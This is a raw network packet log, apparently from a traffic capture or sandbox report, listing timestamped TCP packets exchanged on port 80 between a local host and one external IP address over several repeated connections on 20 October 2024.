Oct 20, 2024 22:47:49.732378960 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732429981 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732460976 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732494116 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732503891 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732527971 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732553005 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732558012 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732587099 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732614040 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732620955 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732655048 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732659101 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732685089 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.732711077 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732743979 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.737107992 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737287998 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.737628937 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737696886 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.737755060 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737767935 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737780094 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737792969 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737804890 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.737834930 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.737881899 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.780857086 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.781019926 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.832999945 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:50.346488953 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.232439995 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.232527018 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.232604980 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.237523079 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.347621918 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.353471041 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.353600025 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.353699923 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.353765011 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.358983040 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359056950 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359112978 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359164953 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359288931 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359317064 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359349966 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359352112 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359364986 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359411955 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359432936 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359484911 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359500885 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359529018 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359556913 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.359561920 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359572887 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.359606981 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.363771915 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.363894939 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364187956 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364217997 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364237070 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364245892 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364258051 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364311934 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364311934 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364341021 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364366055 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364399910 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.364428043 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.364481926 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.404884100 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.405117035 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:51.452919006 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:51.969994068 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.856801033 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.857014894 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.857073069 CEST	49769	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.862019062 CEST	80	49769	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.973386049 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.978279114 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.978370905 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.978470087 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.978553057 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983414888 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983428955 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983463049 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983477116 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983493090 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983506918 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983546972 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983547926 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983612061 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983668089 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983680964 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983692884 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983707905 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.983741045 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.983772993 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.988086939 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988151073 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.988301039 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988385916 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988394976 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.988421917 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988440037 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988446951 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.988450050 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988471985 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:52.988506079 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:52.988528013 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:53.032999039 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:53.033181906 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:53.084985018 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:53.587807894 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.453285933 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.453383923 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.453430891 CEST	49770	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.458379984 CEST	80	49770	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.580199957 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.585824013 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.585944891 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.633071899 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.633198977 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.637968063 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638042927 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638191938 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638248920 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638261080 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638278008 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638304949 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638329983 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638350964 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638380051 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638402939 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638410091 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.638442039 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.638464928 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.641779900 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.641808987 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.641836882 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.641844034 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.641916990 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.642954111 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643009901 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.643481970 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643511057 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643538952 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643548012 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.643567085 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643588066 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.643595934 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643621922 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.643630981 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.643644094 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.643692970 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.684940100 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:54.685049057 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:54.732901096 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:55.202538013 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.107722044 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.107814074 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.107903957 CEST	49771	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.116559982 CEST	80	49771	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.221482992 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.226409912 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.226514101 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.226617098 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.226687908 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231499910 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231566906 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231699944 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231755972 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231762886 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231812954 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231816053 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231862068 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231872082 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231901884 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231920958 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231951952 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.231967926 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.231997967 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.232021093 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.232024908 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.232053995 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.232081890 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.236251116 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.236330032 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.236423969 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.236480951 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.236809015 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.236865997 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.236939907 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.236989021 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.241200924 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.241230011 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.241257906 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.241261005 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.241292953 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.284939051 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.285079002 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:56.336877108 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:56.839951038 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.810652018 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.810884953 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.810972929 CEST	49772	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.815891027 CEST	80	49772	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.924498081 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.929472923 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.929570913 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.929666042 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.929749966 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.934618950 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.934676886 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.934689999 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.934714079 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.934745073 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.934782028 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.934870958 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.934897900 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.934935093 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.934978008 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.935098886 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.935161114 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.935203075 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.935230970 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.935256958 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.935267925 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.935311079 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.939426899 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.939497948 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.939697981 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.939727068 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.939764977 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.939821005 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.939848900 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.939882994 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.939912081 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.939948082 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.940009117 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.940036058 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.940093040 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:57.984921932 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:57.985042095 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:58.036947012 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:58.543838024 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.454761028 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.454873085 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.454952002 CEST	49773	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.459775925 CEST	80	49773	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.565802097 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.570789099 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.570887089 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.571260929 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.571436882 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576208115 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576273918 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576479912 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576538086 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576549053 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576577902 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576606035 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576611042 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576641083 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576657057 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576684952 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576700926 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576716900 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576735973 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576762915 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.576805115 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.576864004 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.580981970 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581044912 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.581118107 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581175089 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.581547022 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581612110 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.581690073 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581717968 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581747055 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581752062 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.581779957 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.581805944 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.581831932 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.628897905 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:59.629008055 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:59.680902958 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:00.186594009 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.062725067 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.062917948 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.062917948 CEST	49774	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.069022894 CEST	80	49774	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.174876928 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.179852009 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.179939032 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.180058956 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.180129051 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185051918 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185113907 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185266018 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185296059 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185318947 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185324907 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185352087 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185353041 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185367107 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185381889 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185399055 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185410023 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185425997 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185441971 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185447931 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185492992 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.185493946 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.185540915 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.189774990 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.189877987 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.189965010 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190013885 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.190366030 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190418005 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.190428019 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190490961 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190524101 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190553904 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.190571070 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.190596104 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.190651894 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:01.232969046 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:01.233074903 CEST	49776	80	192.168.2.4	193.46.218.44
